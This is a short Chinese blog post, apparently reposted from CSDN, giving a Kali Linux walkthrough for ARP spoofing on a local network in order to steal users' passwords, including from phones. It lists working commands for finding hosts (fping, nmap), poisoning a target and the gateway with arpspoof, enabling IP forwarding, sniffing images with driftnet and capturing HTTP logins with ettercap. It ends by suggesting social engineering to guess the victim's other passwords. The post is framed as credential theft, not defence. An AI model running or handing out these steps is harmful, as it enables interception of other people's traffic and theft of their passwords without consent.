kali实现局域网arp欺骗窃取用户密码,手机适用

局域网arp欺骗

发现目标ip

fping -g -r 0 -s 192.168.1.0/24 | grep alive

192.168.1.1 is alive(网关)
192.168.1.107 is alive(我的电脑)
192.168.1.103 is alive
192.168.1.105 is alive

系统检测

nmap -T4 -O 192.169.1.103 192.168.1.105 #后面ip是待检测的ip

找到目标

arp欺骗

arpspoof -i eth0(网卡) -t 192.168.1.103(目标ip) 192.168.1.1(网关)

arpspoof -i eth0(网卡) -t 192.168.1.1(网关) 192.168.1.103(目标ip)

进行双向欺骗

这时我手机上不了网了,造成断网假象

附:arpspoof命令安装

sudo apt-get install dsniff ssldump#不行就重启一下

进行端口转发

echo 1 > /proc/sys/net/ipv4/ip_forward

#如果权限不够就:sudo sh -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'

cat /proc/sys/net/ipv4/ip_forward

发现输出为1

这时手机就能上网了

进行图片嗅探(http协议的)

driftnet -i eth0

附:driftnet安装

sudo apt-get install driftnet

嗅探登录密码(http)

ettercap -Tq -i eth0

可以根据社会工程学,密码唯一性,推测其他密码

发布了3 篇原创文章 · 获赞 6 · 访问量 849

猜你喜欢

转载自blog.csdn.net/weixin_44823747/article/details/104177246